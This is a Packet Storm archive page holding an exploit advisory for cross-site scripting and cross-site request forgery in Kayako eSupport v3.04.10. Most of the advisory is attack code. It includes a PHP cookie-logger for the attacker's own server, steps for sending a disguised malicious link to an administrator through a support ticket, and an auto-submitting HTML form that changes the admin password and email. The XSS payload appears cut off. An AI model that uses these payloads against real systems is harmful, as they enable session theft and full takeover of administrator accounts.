exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Kayako XSS / XSRF

Kayako XSS / XSRF
Posted Jan 1, 2010
Authored by D3V!L FucK3r

Kayako suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 7604a80a9ec56bbb94cd1003c5b68890f23c9ea25dacb717b4c4c6d2d65a244d

Kayako XSS / XSRF

Change Mirror Download
#################################################################################################################
[+] Exploit Title : kayako (xss/xsrf) Remote Vulnerabilities
[+] Author : By D3V!L FUCKER
[+] Script Link : http://www.kayako.com/solutions/esupport/
[+] Version : Kayako eSupport v3.04.10
[+] Tested on : linux ubuntu 9.10
[+] Code :
#################################################################################################################
+++++++++++++++++++++++++
http://server/path/staff/index.php?_m=tickets&_a=manage&s_query=">
==================================================================
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php - > Put in this File That Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php

[+]Exploit:
-------
1) Register in The SIte
2)Open New Ticket
3)We Put in
To:admin name
Subject: Some Subject
Message: http://server/path/staff/index.php?_m=tickets&_a=manage&s_query="> //Cover The Link By Any Thing Use Your Brain
The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) Xsrf POC
+++++++++++++++++

<form name="staffform" id="staffform" action="http://site.com/path/admin/index.php?_m=core&_a=editstaff&staffid=1" method="POST">

<body onload="document.forms.staffform.submit();">
<!-- Name -->
<input type="hidden" name="fullname" id="fullname" value="admin" /><br>

<!-- UserName -->
<input type="hidden" name="username" id="username" value="admin" /></br>

<!-- password -->
<input type="hidden" name="password" id="password" value="123123" /></br>

<!-- Re-enter Password -->
<input type="hidden" name="passwordconfirm" id="passwordconfirm" value="123123" /></br>

<!-- E-mail -->
<input type="hidden" name="email" id="email" value="w0@live.no" /></br>

<!-- Mobile Phone Number -->
<input type="hidden" name="mobilenumber" id="mobilenumber" value="" /></br>


<!-- Group -->
<input type="hidden" name="staffgroupid" value="1" /></br>


<!-- Assigned Departments -->
<input type="hidden" name="assigneddepid[]" value="1" /></br>

<input type="hidden" name="submitbutton" class="yellowbuttonbig" value="Update Staff" /> </br>

</table></td></tr></tbody></table>

<input type="hidden" name="_m" value="core"/>

<input type="hidden" name="_a" value="editstaff"/>

<input type="hidden" name="step" value="1"/>

<input type="hidden" name="staffid" value="1"/>


</form>

</html>

################################################################################################################

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close